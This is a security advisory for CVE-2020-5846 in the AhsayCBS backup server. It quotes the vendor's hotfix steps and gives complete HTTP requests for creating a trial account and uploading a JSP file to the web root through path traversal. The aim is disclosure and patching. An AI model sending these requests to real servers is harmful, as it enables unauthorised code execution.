Ahsay Cloud Backup - part 2

AhsayCBS is a server component to be installed on a physical server or virtual machine. It comes with a web based central management console for system administrator to easily manage the whole backup system, as well as all AhsayOBM / AhsayACB backup users and their backup data through any web browser. Users can also login to the User Web Console to manage backup set, perform backup/restore and monitor live activities.

Users' backup data can be hosted on AhsayCBS internal storage, FTP / SFTP server, and cloud storage (e.g. Amazon S3, Google Cloud Storage, Microsoft Azure, etc.).



CVE-2020-5846 - File Upload

Advisory

Ahsay has released an unofficial hotfix.

Hi,

Just to let you know that, our development team has released the unofficial hotfix for the vulnerability issue.

However, as the hotfix is based on CBS v8.3.0.30. So, please upgrade your CBS to v8.3.0.30 first by:

FAQ: How to install the latest patch set for AhsayCBS? (5145)

http://wiki.ahsay.com/doku.php?id=public:8009_faq:how_to_install_the_latest_patch_set_for_ahsaycbs
Note: Before you deploy the patch to your CBS: Make sure you have make a copy of your application folder before making any change.

After that, you can apply the unofficial hotfix to the update CBS server. It can be downloaded from the below link:

For Windows:
http://download.ahsay.com/dev/hot-fixes/83/830122/cbs-win-hotfix-task26000.zip

For NIX:
http://download.ahsay.com/dev/hot-fixes/83/830122/cbs-nix-hotfix-task26000.zip

Please apply it by the following steps onto the CBS:
1. Stop CBS service
2. Make a copy of the folder "$CBS_HOME/lib" or "CBS_HOME\lib" for safety purpose
3. Extract the contents of the hotfix file to "$CBS_HOME/lib" or "$CBS_HOME\lib" (overwrite existing)
4. Restart CBS service

The fix will be included in our next official release.

Technical details

To exploit this vulnerability we need create a trial account or have valid credentials. By default trial account creation is enabled. We can verify if a system has trial accounts enabled with the following POST request to the server.

POST /obs/obm7/user/isTrialEnabled HTTP/1.1
Host: 172.16.238.175
Connection: close
Content-Length: 0
        

If the server replies withe "ENABLED" we can create a trial account.

Creating the trial account we first need to base64 encode the username and password and place these in the POST request header like below:

POST /obs/obm7/user/addTrialUser HTTP/1.1
Host: 172.16.238.175
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-RSW-custom-encode-username: Z3pTc1pnMmE=
X-RSW-custom-encode-password: elh1QmtRU24wMTU3MF4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Connection: close
        

If the account is created succesfully the server will respond with "HTTP/1.1 200 OK"

Now for the upload part, we can upload any file to any location on the server as long as the Ahsay server user has privileges to.

For this to work we need to set the following headers and base64 encode the content:

Below the full PUT request to upload

PUT /obs/obm7/file/upload HTTP/1.1
Host: 172.16.238.175
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
X-RSW-Request-0: Z3pTc1pnMmE=
X-RSW-Request-1: elh1QmtRU24wMTU3MF4=
X-RSW-custom-encode-path: Li4vLi4vd2ViYXBwcy9jYnMvaGVscC9lbi9oZWxsb193b3JsZC5qc3A=
Content-Length: 98
Connection: close

<%= "Hello World!" %>

The server should respond with "HTTP/1.1 201 Created" and in this case we can access the file in a browser. https://172.16.238.175/cbs/help/en/hello_world.jsp returning "Hello World!"